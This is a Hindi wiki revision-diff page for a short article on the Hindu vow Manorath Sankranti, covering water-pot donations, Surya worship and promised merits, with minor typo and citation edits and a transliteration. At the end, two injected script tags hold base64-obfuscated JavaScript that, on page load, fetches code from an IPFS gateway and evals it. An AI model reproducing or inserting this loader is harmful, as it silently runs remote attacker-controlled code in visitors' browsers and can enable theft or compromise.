Difference between revisions of "मनोरथ संक्रान्ति"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[वर्ष]] भर प्रत्येक संक्रान्ति दिन पर जलपूर्ण घट का गुड़ एवं वस्त्र के साथ किसी गृहस्थ को दान करना चाहिए।  
 
*[[वर्ष]] भर प्रत्येक संक्रान्ति दिन पर जलपूर्ण घट का गुड़ एवं वस्त्र के साथ किसी गृहस्थ को दान करना चाहिए।  
 
*इस व्रत में [[देवता]] [[सूर्य देवता|सूर्य]] की पूजा करनी चाहिए।  
 
*इस व्रत में [[देवता]] [[सूर्य देवता|सूर्य]] की पूजा करनी चाहिए।  
*ऐसी मान्यता है कि कर्ता की कामनाओं की पूर्ति होती है और पाप मुक्ति एवं सूर्य लोक की प्राप्ति होती है।<ref>हेमाद्रि (व्रत0 2, 731, स्कन्दपुराण से उद्धरण)</ref>  
+
*ऐसी मान्यता है कि कर्ता की कामनाओं की पूर्ति होती है और पाप मुक्ति एवं सूर्य लोक की प्राप्ति होती है।<ref>हेमाद्रि (व्रत0 2, 731, स्कन्दपुराण से उद्धरण</ref>  
 
 
 
 
  
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:56, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • varsh bhar pratyek sankranti din par jalapoorn ghat ka gu d evan vastr ke sath kisi grihasth ko dan karana chahie.
  • is vrat mean devata soory ki pooja karani chahie.
  • aisi manyata hai ki karta ki kamanaoan ki poorti hoti hai aur pap mukti evan soory lok ki prapti hoti hai.[1]

 



tika tippani aur sandarbh

  1. hemadri (vrat0 2, 731, skandapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>